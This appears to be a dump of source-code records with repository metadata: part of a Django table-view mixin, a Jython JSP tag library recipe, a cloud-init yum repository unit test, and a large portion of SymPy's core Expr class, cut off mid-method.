return JsonResponse(pico.get_data(json.loads(query_json)), encoder=ExtendedJSONEncoder)
def get(self, request, *args, **kwargs):
query = request.GET.get("jq")
if query:
return self.process_picotable(query)
return super(PicotableViewMixin, self).get(request, *args, **kwargs)
def get_object_url(self, instance):
try:
return get_model_url(instance)
except NoModelUrl:
pass
return None
def get_object_abstract(self, instance, item):
"""
Get the object abstract lines (used for mobile layouts) for this object.
Supported keys in abstract line dicts are:
* text (required)
* title
* class (CSS class name -- `header` for instance)
* raw (boolean; whether or not the `text` is raw HTML)
:param instance: The instance
:param item: The item dict so far. Useful for reusing precalculated values.
:return: Iterable of dicts to pass through to the picotable javascript
:rtype: Iterable[dict]
"""
return None
def get_filter(self):
filter_string = self.request.GET.get("filter")
return json.loads(filter_string) if filter_string else {}
|
agpl-3.0
| 7,626,388,386,203,150,000
| 33.992147
| 119
| 0.597292
| false
| 3.998504
| true
| false
| false
|
ActiveState/code
|
recipes/Python/252132_generic_jythtaglib/recipe-252132.py
|
1
|
3673
|
## store this into classes/jython/get.java
package jython;
import javax.servlet.jsp.*;
import javax.servlet.jsp.tagext.*;
import org.python.util.PythonInterpreter;
import org.python.core.*;
public class get extends TagSupport{
public PythonInterpreter interp;
public String cmd;
protected PageContext pageContext;
public get(){super();}
public void setVar(String cmd){this.cmd=cmd;}
public void setPageContext(PageContext pageContext) {
this.pageContext = pageContext;
}
public int doEndTag() throws javax.servlet.jsp.JspTagException{
try{
if(pageContext.getAttribute("jythonInterp")==null){
interp = new PythonInterpreter();
pageContext.setAttribute("jythonInterp",interp,PageContext.PAGE_SCOPE);
} else {
interp=(PythonInterpreter)pageContext.getAttribute("jythonInterp");
}
String res=interp.eval(cmd).toString();
pageContext.getOut().write(res);
}catch(java.io.IOException e){
throw new JspTagException("IO Error: " + e.getMessage());
}
return EVAL_PAGE;
}
}
## store this into classes/jython/exec.java
package jython;
import javax.servlet.jsp.*;
import javax.servlet.jsp.tagext.*;
import org.python.util.PythonInterpreter;
public class exec extends BodyTagSupport{
public PythonInterpreter interp;
public void setParent(Tag parent) {
this.parent = parent;
}
public void setBodyContent(BodyContent bodyOut) {
this.bodyOut = bodyOut;
}
public void setPageContext(PageContext pageContext) {
this.pageContext = pageContext;
}
public Tag getParent() {
return this.parent;
}
public int doStartTag() throws JspException {
return EVAL_BODY_TAG;
}
public int doEndTag() throws JspException {
return EVAL_PAGE;
}
// Default implementations for BodyTag methods as well
// just in case a tag decides to implement BodyTag.
public void doInitBody() throws JspException {
}
public int doAfterBody() throws JspException {
String cmd = bodyOut.getString();
if(pageContext.getAttribute("jythonInterp")==null){
interp = new PythonInterpreter();
interp.set("pageContext",pageContext);
pageContext.setAttribute("jythonInterp",interp,PageContext.PAGE_SCOPE);
} else {
interp=(PythonInterpreter)pageContext.getAttribute("jythonInterp");
}
interp.exec(cmd);
return SKIP_BODY;
}
public void release() {
bodyOut = null;
pageContext = null;
parent = null;
}
protected BodyContent bodyOut;
protected PageContext pageContext;
protected Tag parent;
}
## store this into jsp/jython.tld
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE taglib PUBLIC "-//Sun Microsystems, Inc.//DTD JSP Tag Library 1.1//EN" "http://java.sun.com/j2ee/dtds/web-jsptaglibrary_1_1.dtd">
<taglib>
<tlibversion>1.0</tlibversion>
<jspversion>1.1</jspversion>
<shortname>jython</shortname>
<info>
A simple Jython tag library
</info>
<tag>
<name>exec</name>
<tagclass>jython.exec</tagclass>
</tag>
<tag>
<name>get</name>
<tagclass>jython.get</tagclass>
<bodycontent>empty</bodycontent>
<attribute>
<name>var</name>
<required>true</required>
</attribute>
</tag>
</taglib>
## add this to the web.xml file
<taglib>
<taglib-uri>http://www.jython.org</taglib-uri>
<taglib-location>/WEB-INF/jsp/jython.tld</taglib-location>
</taglib>
|
mit
| -4,884,085,414,985,294,000
| 25.615942
| 139
| 0.643616
| false
| 3.673
| false
| false
| false
|
cbuben/cloud-init
|
tests/unittests/test_handler/test_handler_yum_add_repo.py
|
1
|
2372
|
from cloudinit import util
from cloudinit.config import cc_yum_add_repo
from .. import helpers
import logging
from StringIO import StringIO
import configobj
LOG = logging.getLogger(__name__)
class TestConfig(helpers.FilesystemMockingTestCase):
def setUp(self):
super(TestConfig, self).setUp()
self.tmp = self.makeDir(prefix="unittest_")
def test_bad_config(self):
cfg = {
'yum_repos': {
'epel-testing': {
'name': 'Extra Packages for Enterprise Linux 5 - Testing',
# Missing this should cause the repo not to be written
# 'baseurl': 'http://blah.org/pub/epel/testing/5/$basearch',
'enabled': False,
'gpgcheck': True,
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL',
'failovermethod': 'priority',
},
},
}
self.patchUtils(self.tmp)
cc_yum_add_repo.handle('yum_add_repo', cfg, None, LOG, [])
self.assertRaises(IOError, util.load_file,
"/etc/yum.repos.d/epel_testing.repo")
def test_write_config(self):
cfg = {
'yum_repos': {
'epel-testing': {
'name': 'Extra Packages for Enterprise Linux 5 - Testing',
'baseurl': 'http://blah.org/pub/epel/testing/5/$basearch',
'enabled': False,
'gpgcheck': True,
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL',
'failovermethod': 'priority',
},
},
}
self.patchUtils(self.tmp)
cc_yum_add_repo.handle('yum_add_repo', cfg, None, LOG, [])
contents = util.load_file("/etc/yum.repos.d/epel_testing.repo")
contents = configobj.ConfigObj(StringIO(contents))
expected = {
'epel_testing': {
'name': 'Extra Packages for Enterprise Linux 5 - Testing',
'failovermethod': 'priority',
'gpgkey': 'file:///etc/pki/rpm-gpg/RPM-GPG-KEY-EPEL',
'enabled': '0',
'baseurl': 'http://blah.org/pub/epel/testing/5/$basearch',
'gpgcheck': '1',
}
}
self.assertEquals(expected, dict(contents))
|
gpl-3.0
| -351,846,011,476,720,400
| 34.402985
| 80
| 0.510118
| false
| 3.907743
| true
| false
| false
|
Curious72/sympy
|
sympy/core/expr.py
|
1
|
113033
|
from __future__ import print_function, division
from .sympify import sympify, _sympify, SympifyError
from .basic import Basic, Atom
from .singleton import S
from .evalf import EvalfMixin, pure_complex
from .decorators import _sympifyit, call_highest_priority
from .cache import cacheit
from .compatibility import reduce, as_int, default_sort_key, range
from mpmath.libmp import mpf_log, prec_to_dps
from collections import defaultdict
class Expr(Basic, EvalfMixin):
"""
Base class for algebraic expressions.
Everything that requires arithmetic operations to be defined
should subclass this class, instead of Basic (which should be
used only for argument storage and expression manipulation, i.e.
pattern matching, substitutions, etc).
See Also
========
sympy.core.basic.Basic
"""
__slots__ = []
@property
def _diff_wrt(self):
"""Is it allowed to take derivative wrt to this instance.
This determines if it is allowed to take derivatives wrt this object.
Subclasses such as Symbol, Function and Derivative should return True
to enable derivatives wrt them. The implementation in Derivative
separates the Symbol and non-Symbol _diff_wrt=True variables and
temporarily converts the non-Symbol vars in Symbols when performing
the differentiation.
Note, see the docstring of Derivative for how this should work
mathematically. In particular, note that expr.subs(yourclass, Symbol)
should be well-defined on a structural level, or this will lead to
inconsistent results.
Examples
========
>>> from sympy import Expr
>>> e = Expr()
>>> e._diff_wrt
False
>>> class MyClass(Expr):
... _diff_wrt = True
...
>>> (2*MyClass()).diff(MyClass())
2
"""
return False
@cacheit
def sort_key(self, order=None):
coeff, expr = self.as_coeff_Mul()
if expr.is_Pow:
expr, exp = expr.args
else:
expr, exp = expr, S.One
if expr.is_Dummy:
args = (expr.sort_key(),)
elif expr.is_Atom:
args = (str(expr),)
else:
if expr.is_Add:
args = expr.as_ordered_terms(order=order)
elif expr.is_Mul:
args = expr.as_ordered_factors(order=order)
else:
args = expr.args
args = tuple(
[ default_sort_key(arg, order=order) for arg in args ])
args = (len(args), tuple(args))
exp = exp.sort_key(order=order)
return expr.class_key(), args, exp, coeff
# ***************
# * Arithmetics *
# ***************
# Expr and its sublcasses use _op_priority to determine which object
# passed to a binary special method (__mul__, etc.) will handle the
# operation. In general, the 'call_highest_priority' decorator will choose
# the object with the highest _op_priority to handle the call.
# Custom subclasses that want to define their own binary special methods
# should set an _op_priority value that is higher than the default.
#
# **NOTE**:
# This is a temporary fix, and will eventually be replaced with
# something better and more powerful. See issue 5510.
_op_priority = 10.0
def __pos__(self):
return self
def __neg__(self):
return Mul(S.NegativeOne, self)
def __abs__(self):
from sympy import Abs
return Abs(self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__radd__')
def __add__(self, other):
return Add(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__add__')
def __radd__(self, other):
return Add(other, self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rsub__')
def __sub__(self, other):
return Add(self, -other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__sub__')
def __rsub__(self, other):
return Add(other, -self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rmul__')
def __mul__(self, other):
return Mul(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__mul__')
def __rmul__(self, other):
return Mul(other, self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rpow__')
def __pow__(self, other):
return Pow(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__pow__')
def __rpow__(self, other):
return Pow(other, self)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rdiv__')
def __div__(self, other):
return Mul(self, Pow(other, S.NegativeOne))
@_sympifyit('other', NotImplemented)
@call_highest_priority('__div__')
def __rdiv__(self, other):
return Mul(other, Pow(self, S.NegativeOne))
__truediv__ = __div__
__rtruediv__ = __rdiv__
@_sympifyit('other', NotImplemented)
@call_highest_priority('__rmod__')
def __mod__(self, other):
return Mod(self, other)
@_sympifyit('other', NotImplemented)
@call_highest_priority('__mod__')
def __rmod__(self, other):
return Mod(other, self)
def __int__(self):
# Although we only need to round to the units position, we'll
# get one more digit so the extra testing below can be avoided
# unless the rounded value rounded to an integer, e.g. if an
# expression were equal to 1.9 and we rounded to the unit position
# we would get a 2 and would not know if this rounded up or not
# without doing a test (as done below). But if we keep an extra
# digit we know that 1.9 is not the same as 1 and there is no
# need for further testing: our int value is correct. If the value
# were 1.99, however, this would round to 2.0 and our int value is
# off by one. So...if our round value is the same as the int value
# (regardless of how much extra work we do to calculate extra decimal
# places) we need to test whether we are off by one.
from sympy import Dummy
r = self.round(2)
if not r.is_Number:
raise TypeError("can't convert complex to int")
if r in (S.NaN, S.Infinity, S.NegativeInfinity):
raise TypeError("can't convert %s to int" % r)
i = int(r)
if not i:
return 0
# off-by-one check
if i == r and not (self - i).equals(0):
isign = 1 if i > 0 else -1
x = Dummy()
# in the following (self - i).evalf(2) will not always work while
# (self - r).evalf(2) and the use of subs does; if the test that
# was added when this comment was added passes, it might be safe
# to simply use sign to compute this rather than doing this by hand:
diff_sign = 1 if (self - x).evalf(2, subs={x: i}) > 0 else -1
if diff_sign != isign:
i -= isign
return i
__long__ = __int__
def __float__(self):
# Don't bother testing if it's a number; if it's not this is going
# to fail, and if it is we still need to check that it evalf'ed to
# a number.
result = self.evalf()
if result.is_Number:
return float(result)
if result.is_number and result.as_real_imag()[1]:
raise TypeError("can't convert complex to float")
raise TypeError("can't convert expression to float")
def __complex__(self):
result = self.evalf()
re, im = result.as_real_imag()
return complex(float(re), float(im))
def __ge__(self, other):
from sympy import GreaterThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s >= %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_nonnegative is not None and \
dif.is_nonnegative is not dif.is_negative:
return sympify(dif.is_nonnegative)
return GreaterThan(self, other, evaluate=False)
def __le__(self, other):
from sympy import LessThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s <= %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_nonpositive is not None and \
dif.is_nonpositive is not dif.is_positive:
return sympify(dif.is_nonpositive)
return LessThan(self, other, evaluate=False)
def __gt__(self, other):
from sympy import StrictGreaterThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s > %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_positive is not None and \
dif.is_positive is not dif.is_nonpositive:
return sympify(dif.is_positive)
return StrictGreaterThan(self, other, evaluate=False)
def __lt__(self, other):
from sympy import StrictLessThan
try:
other = _sympify(other)
except SympifyError:
raise TypeError("Invalid comparison %s < %s" % (self, other))
for me in (self, other):
if (me.is_complex and me.is_real is False) or \
me.has(S.ComplexInfinity):
raise TypeError("Invalid comparison of complex %s" % me)
if me is S.NaN:
raise TypeError("Invalid NaN comparison")
if self.is_real and other.is_real:
dif = self - other
if dif.is_negative is not None and \
dif.is_negative is not dif.is_nonnegative:
return sympify(dif.is_negative)
return StrictLessThan(self, other, evaluate=False)
@staticmethod
def _from_mpmath(x, prec):
from sympy import Float
if hasattr(x, "_mpf_"):
return Float._new(x._mpf_, prec)
elif hasattr(x, "_mpc_"):
re, im = x._mpc_
re = Float._new(re, prec)
im = Float._new(im, prec)*S.ImaginaryUnit
return re + im
else:
raise TypeError("expected mpmath number (mpf or mpc)")
@property
def is_number(self):
"""Returns True if 'self' has no free symbols.
It will be faster than `if not self.free_symbols`, however, since
`is_number` will fail as soon as it hits a free symbol.
Examples
========
>>> from sympy import log, Integral
>>> from sympy.abc import x
>>> x.is_number
False
>>> (2*x).is_number
False
>>> (2 + log(2)).is_number
True
>>> (2 + Integral(2, x)).is_number
False
>>> (2 + Integral(2, (x, 1, 2))).is_number
True
"""
return all(obj.is_number for obj in self.args)
def _random(self, n=None, re_min=-1, im_min=-1, re_max=1, im_max=1):
"""Return self evaluated, if possible, replacing free symbols with
random complex values, if necessary.
The random complex value for each free symbol is generated
by the random_complex_number routine giving real and imaginary
parts in the range given by the re_min, re_max, im_min, and im_max
values. The returned value is evaluated to a precision of n
(if given) else the maximum of 15 and the precision needed
to get more than 1 digit of precision. If the expression
could not be evaluated to a number, or could not be evaluated
to more than 1 digit of precision, then None is returned.
Examples
========
>>> from sympy import sqrt
>>> from sympy.abc import x, y
>>> x._random() # doctest: +SKIP
0.0392918155679172 + 0.916050214307199*I
>>> x._random(2) # doctest: +SKIP
-0.77 - 0.87*I
>>> (x + y/2)._random(2) # doctest: +SKIP
-0.57 + 0.16*I
>>> sqrt(2)._random(2)
1.4
See Also
========
sympy.utilities.randtest.random_complex_number
"""
free = self.free_symbols
prec = 1
if free:
from sympy.utilities.randtest import random_complex_number
a, c, b, d = re_min, re_max, im_min, im_max
reps = dict(list(zip(free, [random_complex_number(a, b, c, d, rational=True)
for zi in free])))
try:
nmag = abs(self.evalf(2, subs=reps))
except (ValueError, TypeError):
# if an out of range value resulted in evalf problems
# then return None -- XXX is there a way to know how to
# select a good random number for a given expression?
# e.g. when calculating n! negative values for n should not
# be used
return None
else:
reps = {}
nmag = abs(self.evalf(2))
if not hasattr(nmag, '_prec'):
# e.g. exp_polar(2*I*pi) doesn't evaluate but is_number is True
return None
if nmag._prec == 1:
# increase the precision up to the default maximum
# precision to see if we can get any significance
from mpmath.libmp.libintmath import giant_steps
from sympy.core.evalf import DEFAULT_MAXPREC as target
# evaluate
for prec in giant_steps(2, target):
nmag = abs(self.evalf(prec, subs=reps))
if nmag._prec != 1:
break
if nmag._prec != 1:
if n is None:
n = max(prec, 15)
return self.evalf(n, subs=reps)
# never got any significance
return None
def is_constant(self, *wrt, **flags):
"""Return True if self is constant, False if not, or None if
the constancy could not be determined conclusively.
If an expression has no free symbols then it is a constant. If
there are free symbols it is possible that the expression is a
constant, perhaps (but not necessarily) zero. To test such
expressions, two strategies are tried:
1) numerical evaluation at two random points. If two such evaluations
give two different values and the values have a precision greater than
1 then self is not constant. If the evaluations agree or could not be
obtained with any precision, no decision is made. The numerical testing
is done only if ``wrt`` is different than the free symbols.
2) differentiation with respect to variables in 'wrt' (or all free
symbols if omitted) to see if the expression is constant or not. This
will not always lead to an expression that is zero even though an
expression is constant (see added test in test_expr.py). If
all derivatives are zero then self is constant with respect to the
given symbols.
If neither evaluation nor differentiation can prove the expression is
constant, None is returned unless two numerical values happened to be
the same and the flag ``failing_number`` is True -- in that case the
numerical value will be returned.
If flag simplify=False is passed, self will not be simplified;
the default is True since self should be simplified before testing.
Examples
========
>>> from sympy import cos, sin, Sum, S, pi
>>> from sympy.abc import a, n, x, y
>>> x.is_constant()
False
>>> S(2).is_constant()
True
>>> Sum(x, (x, 1, 10)).is_constant()
True
>>> Sum(x, (x, 1, n)).is_constant()
False
>>> Sum(x, (x, 1, n)).is_constant(y)
True
>>> Sum(x, (x, 1, n)).is_constant(n)
False
>>> Sum(x, (x, 1, n)).is_constant(x)
True
>>> eq = a*cos(x)**2 + a*sin(x)**2 - a
>>> eq.is_constant()
True
>>> eq.subs({x: pi, a: 2}) == eq.subs({x: pi, a: 3}) == 0
True
>>> (0**x).is_constant()
False
>>> x.is_constant()
False
>>> (x**x).is_constant()
False
>>> one = cos(x)**2 + sin(x)**2
>>> one.is_constant()
True
>>> ((one - 1)**(x + 1)).is_constant() in (True, False) # could be 0 or 1
True
"""
simplify = flags.get('simplify', True)
# Except for expressions that contain units, only one of these should
# be necessary since if something is
# known to be a number it should also know that there are no
# free symbols. But is_number quits as soon as it hits a non-number
# whereas free_symbols goes until all free symbols have been collected,
# thus is_number should be faster. But a double check on free symbols
# is made just in case there is a discrepancy between the two.
free = self.free_symbols
if self.is_number or not free:
# if the following assertion fails then that object's free_symbols
# method needs attention: if an expression is a number it cannot
# have free symbols
assert not free
return True
# if we are only interested in some symbols and they are not in the
# free symbols then this expression is constant wrt those symbols
wrt = set(wrt)
if wrt and not wrt & free:
return True
wrt = wrt or free
# simplify unless this has already been done
expr = self
if simplify:
expr = expr.simplify()
# is_zero should be a quick assumptions check; it can be wrong for
# numbers (see test_is_not_constant test), giving False when it
# shouldn't, but hopefully it will never give True unless it is sure.
if expr.is_zero:
return True
# try numerical evaluation to see if we get two different values
failing_number = None
if wrt == free:
# try 0 (for a) and 1 (for b)
try:
a = expr.subs(list(zip(free, [0]*len(free))),
simultaneous=True)
if a is S.NaN:
# evaluation may succeed when substitution fails
a = expr._random(None, 0, 0, 0, 0)
except ZeroDivisionError:
a = None
if a is not None and a is not S.NaN:
try:
b = expr.subs(list(zip(free, [1]*len(free))),
simultaneous=True)
if b is S.NaN:
# evaluation may succeed when substitution fails
b = expr._random(None, 1, 0, 1, 0)
except ZeroDivisionError:
b = None
if b is not None and b is not S.NaN and b.equals(a) is False:
return False
# try random real
b = expr._random(None, -1, 0, 1, 0)
if b is not None and b is not S.NaN and b.equals(a) is False:
return False
# try random complex
b = expr._random()
if b is not None and b is not S.NaN:
if b.equals(a) is False:
return False
failing_number = a if a.is_number else b
# now we will test each wrt symbol (or all free symbols) to see if the
# expression depends on them or not using differentiation. This is
# not sufficient for all expressions, however, so we don't return
# False if we get a derivative other than 0 with free symbols.
for w in wrt:
deriv = expr.diff(w)
if simplify:
deriv = deriv.simplify()
if deriv != 0:
if not (pure_complex(deriv, or_real=True)):
if flags.get('failing_number', False):
return failing_number
elif deriv.free_symbols:
# dead line provided _random returns None in such cases
return None
return False
return True
def equals(self, other, failing_expression=False):
"""Return True if self == other, False if it doesn't, or None. If
failing_expression is True then the expression which did not simplify
to a 0 will be returned instead of None.
If ``self`` is a Number (or complex number) that is not zero, then
the result is False.
If ``self`` is a number and has not evaluated to zero, evalf will be
used to test whether the expression evaluates to zero. If it does so
and the result has significance (i.e. the precision is either -1, for
a Rational result, or is greater than 1) then the evalf value will be
used to return True or False.
"""
from sympy.simplify.simplify import nsimplify, simplify
from sympy.solvers.solvers import solve
from sympy.solvers.solveset import solveset
from sympy.polys.polyerrors import NotAlgebraic
from sympy.polys.numberfields import minimal_polynomial
other = sympify(other)
if self == other:
return True
# they aren't the same so see if we can make the difference 0;
# don't worry about doing simplification steps one at a time
# because if the expression ever goes to 0 then the subsequent
# simplification steps that are done will be very fast.
diff = factor_terms((self - other).simplify(), radical=True)
if not diff:
return True
if not diff.has(Add, Mod):
# if there is no expanding to be done after simplifying
# then this can't be a zero
return False
constant = diff.is_constant(simplify=False, failing_number=True)
if constant is False:
return False
if constant is None and (diff.free_symbols or not diff.is_number):
# e.g. unless the right simplification is done, a symbolic
# zero is possible (see expression of issue 6829: without
# simplification constant will be None).
return
if constant is True:
ndiff = diff._random()
if ndiff:
return False
# sometimes we can use a simplified result to give a clue as to
# what the expression should be; if the expression is *not* zero
# then we should have been able to compute that and so now
# we can just consider the cases where the approximation appears
# to be zero -- we try to prove it via minimal_polynomial.
if diff.is_number:
approx = diff.nsimplify()
if not approx:
# try to prove via self-consistency
surds = [s for s in diff.atoms(Pow) if s.args[0].is_Integer]
# it seems to work better to try big ones first
surds.sort(key=lambda x: -x.args[0])
for s in surds:
try:
# simplify is False here -- this expression has already
# been identified as being hard to identify as zero;
# we will handle the checking ourselves using nsimplify
# to see if we are in the right ballpark or not and if so
# *then* the simplification will be attempted.
if s.is_Symbol:
sol = list(solveset(diff, s))
else:
sol = [s]
if sol:
if s in sol:
return True
if s.is_real:
if any(nsimplify(si, [s]) == s and simplify(si) == s
for si in sol):
return True
except NotImplementedError:
pass
# try to prove with minimal_polynomial but know when
# *not* to use this or else it can take a long time. e.g. issue 8354
if True: # change True to condition that assures non-hang
try:
mp = minimal_polynomial(diff)
if mp.is_Symbol:
return True
return False
except (NotAlgebraic, NotImplementedError):
pass
# diff has not simplified to zero; constant is either None, True
# or the number with significance (prec != 1) that was randomly
# calculated twice as the same value.
if constant not in (True, None) and constant != 0:
return False
if failing_expression:
return diff
return None
def _eval_is_positive(self):
from sympy.polys.numberfields import minimal_polynomial
from sympy.polys.polyerrors import NotAlgebraic
if self.is_number:
if self.is_real is False:
return False
try:
# check to see that we can get a value
n2 = self._eval_evalf(2)
if n2 is None:
raise AttributeError
if n2._prec == 1: # no significance
raise AttributeError
if n2 == S.NaN:
raise AttributeError
except (AttributeError, ValueError):
return None
n, i = self.evalf(2).as_real_imag()
if not i.is_Number or not n.is_Number:
return False
if n._prec != 1 and i._prec != 1:
return bool(not i and n > 0)
elif n._prec == 1 and (not i or i._prec == 1) and \
self.is_algebraic and not self.has(Function):
try:
if minimal_polynomial(self).is_Symbol:
return False
except (NotAlgebraic, NotImplementedError):
pass
def _eval_is_negative(self):
from sympy.polys.numberfields import minimal_polynomial
from sympy.polys.polyerrors import NotAlgebraic
if self.is_number:
if self.is_real is False:
return False
try:
# check to see that we can get a value
n2 = self._eval_evalf(2)
if n2 is None:
raise AttributeError
if n2._prec == 1: # no significance
raise AttributeError
if n2 == S.NaN:
raise AttributeError
except (AttributeError, ValueError):
return None
n, i = self.evalf(2).as_real_imag()
if not i.is_Number or not n.is_Number:
return False
if n._prec != 1 and i._prec != 1:
return bool(not i and n < 0)
elif n._prec == 1 and (not i or i._prec == 1) and \
self.is_algebraic and not self.has(Function):
try:
if minimal_polynomial(self).is_Symbol:
return False
except (NotAlgebraic, NotImplementedError):
pass
def _eval_interval(self, x, a, b):
"""
Returns evaluation over an interval. For most functions this is:
self.subs(x, b) - self.subs(x, a),
possibly using limit() if NaN is returned from subs.
If b or a is None, it only evaluates -self.subs(x, a) or self.subs(b, x),
respectively.
"""
from sympy.series import limit, Limit
if (a is None and b is None):
raise ValueError('Both interval ends cannot be None.')
if a is None:
A = 0
else:
A = self.subs(x, a)
if A.has(S.NaN, S.Infinity, S.NegativeInfinity, S.ComplexInfinity):
A = limit(self, x, a)
if A is S.NaN:
return A
if isinstance(A, Limit):
raise NotImplementedError("Could not compute limit")
if b is None:
B = 0
else:
B = self.subs(x, b)
if B.has(S.NaN, S.Infinity, S.NegativeInfinity, S.ComplexInfinity):
B = limit(self, x, b)
if isinstance(B, Limit):
raise NotImplementedError("Could not compute limit")
return B - A
def _eval_power(self, other):
# subclass to compute self**other for cases when
# other is not NaN, 0, or 1
return None
def _eval_conjugate(self):
if self.is_real:
return self
elif self.is_imaginary:
return -self
def conjugate(self):
from sympy.functions.elementary.complexes import conjugate as c
return c(self)
def _eval_transpose(self):
from sympy.functions.elementary.complexes import conjugate
if self.is_complex:
return self
elif self.is_hermitian:
return conjugate(self)
elif self.is_antihermitian:
return -conjugate(self)
def transpose(self):
from sympy.functions.elementary.complexes import transpose
return transpose(self)
def _eval_adjoint(self):
from sympy.functions.elementary.complexes import conjugate, transpose
if self.is_hermitian:
return self
elif self.is_antihermitian:
return -self
obj = self._eval_conjugate()
if obj is not None:
return transpose(obj)
obj = self._eval_transpose()
if obj is not None:
return conjugate(obj)
def adjoint(self):
from sympy.functions.elementary.complexes import adjoint
return adjoint(self)
@classmethod
def _parse_order(cls, order):
"""Parse and configure the ordering of terms. """
from sympy.polys.orderings import monomial_key
try:
reverse = order.startswith('rev-')
except AttributeError:
reverse = False
else:
if reverse:
order = order[4:]
monom_key = monomial_key(order)
def neg(monom):
result = []
for m in monom:
if isinstance(m, tuple):
result.append(neg(m))
else:
result.append(-m)
return tuple(result)
def key(term):
_, ((re, im), monom, ncpart) = term
monom = neg(monom_key(monom))
ncpart = tuple([e.sort_key(order=order) for e in ncpart])
coeff = ((bool(im), im), (re, im))
return monom, ncpart, coeff
return key, reverse
def as_ordered_factors(self, order=None):
"""Return list of ordered factors (if Mul) else [self]."""
return [self]
def as_ordered_terms(self, order=None, data=False):
"""
Transform an expression to an ordered list of terms.
Examples
========
>>> from sympy import sin, cos
>>> from sympy.abc import x
>>> (sin(x)**2*cos(x) + sin(x)**2 + 1).as_ordered_terms()
[sin(x)**2*cos(x), sin(x)**2, 1]
"""
key, reverse = self._parse_order(order)
terms, gens = self.as_terms()
if not any(term.is_Order for term, _ in terms):
ordered = sorted(terms, key=key, reverse=reverse)
else:
_terms, _order = [], []
for term, repr in terms:
if not term.is_Order:
_terms.append((term, repr))
else:
_order.append((term, repr))
ordered = sorted(_terms, key=key, reverse=True) \
+ sorted(_order, key=key, reverse=True)
if data:
return ordered, gens
else:
return [term for term, _ in ordered]
def as_terms(self):
"""Transform an expression to a list of terms. """
from .add import Add
from .mul import Mul
from .exprtools import decompose_power
gens, terms = set([]), []
for term in Add.make_args(self):
coeff, _term = term.as_coeff_Mul()
coeff = complex(coeff)
cpart, ncpart = {}, []
if _term is not S.One:
for factor in Mul.make_args(_term):
if factor.is_number:
try:
coeff *= complex(factor)
except TypeError:
pass
else:
continue
if factor.is_commutative:
base, exp = decompose_power(factor)
cpart[base] = exp
gens.add(base)
else:
ncpart.append(factor)
coeff = coeff.real, coeff.imag
ncpart = tuple(ncpart)
terms.append((term, (coeff, cpart, ncpart)))
gens = sorted(gens, key=default_sort_key)
k, indices = len(gens), {}
for i, g in enumerate(gens):
indices[g] = i
result = []
for term, (coeff, cpart, ncpart) in terms:
monom = [0]*k
for base, exp in cpart.items():
monom[indices[base]] = exp
result.append((term, (coeff, tuple(monom), ncpart)))
return result, gens
def removeO(self):
"""Removes the additive O(..) symbol if there is one"""
return self
def getO(self):
"""Returns the additive O(..) symbol if there is one, else None."""
return None
def getn(self):
"""
Returns the order of the expression.
The order is determined either from the O(...) term. If there
is no O(...) term, it returns None.
Examples
========
>>> from sympy import O
>>> from sympy.abc import x
>>> (1 + x + O(x**2)).getn()
2
>>> (1 + x).getn()
"""
from sympy import Dummy, Symbol
o = self.getO()
if o is None:
return None
elif o.is_Order:
o = o.expr
if o is S.One:
return S.Zero
if o.is_Symbol:
return S.One
if o.is_Pow:
return o.args[1]
if o.is_Mul: # x**n*log(x)**n or x**n/log(x)**n
for oi in o.args:
if oi.is_Symbol:
return S.One
if oi.is_Pow:
syms = oi.atoms(Symbol)
if len(syms) == 1:
x = syms.pop()
oi = oi.subs(x, Dummy('x', positive=True))
if oi.base.is_Symbol and oi.exp.is_Rational:
return abs(oi.exp)
raise NotImplementedError('not sure of order of %s' % o)
def count_ops(self, visual=None):
"""wrapper for count_ops that returns the operation count."""
from .function import count_ops
return count_ops(self, visual)
def args_cnc(self, cset=False, warn=True, split_1=True):
"""Return [commutative factors, non-commutative factors] of self.
self is treated as a Mul and the ordering of the factors is maintained.
If ``cset`` is True the commutative factors will be returned in a set.
If there were repeated factors (as may happen with an unevaluated Mul)
then an error will be raised unless it is explicitly supressed by
setting ``warn`` to False.
Note: -1 is always separated from a Number unless split_1 is False.
>>> from sympy import symbols, oo
>>> A, B = symbols('A B', commutative=0)
>>> x, y = symbols('x y')
>>> (-2*x*y).args_cnc()
[[-1, 2, x, y], []]
>>> (-2.5*x).args_cnc()
[[-1, 2.5, x], []]
>>> (-2*x*A*B*y).args_cnc()
[[-1, 2, x, y], [A, B]]
>>> (-2*x*A*B*y).args_cnc(split_1=False)
[[-2, x, y], [A, B]]
>>> (-2*x*y).args_cnc(cset=True)
[set([-1, 2, x, y]), []]
The arg is always treated as a Mul:
>>> (-2 + x + A).args_cnc()
[[], [x - 2 + A]]
>>> (-oo).args_cnc() # -oo is a singleton
[[-1, oo], []]
"""
if self.is_Mul:
args = list(self.args)
else:
args = [self]
for i, mi in enumerate(args):
if not mi.is_commutative:
c = args[:i]
nc = args[i:]
break
else:
c = args
nc = []
if c and split_1 and (
c[0].is_Number and
c[0].is_negative and
c[0] is not S.NegativeOne):
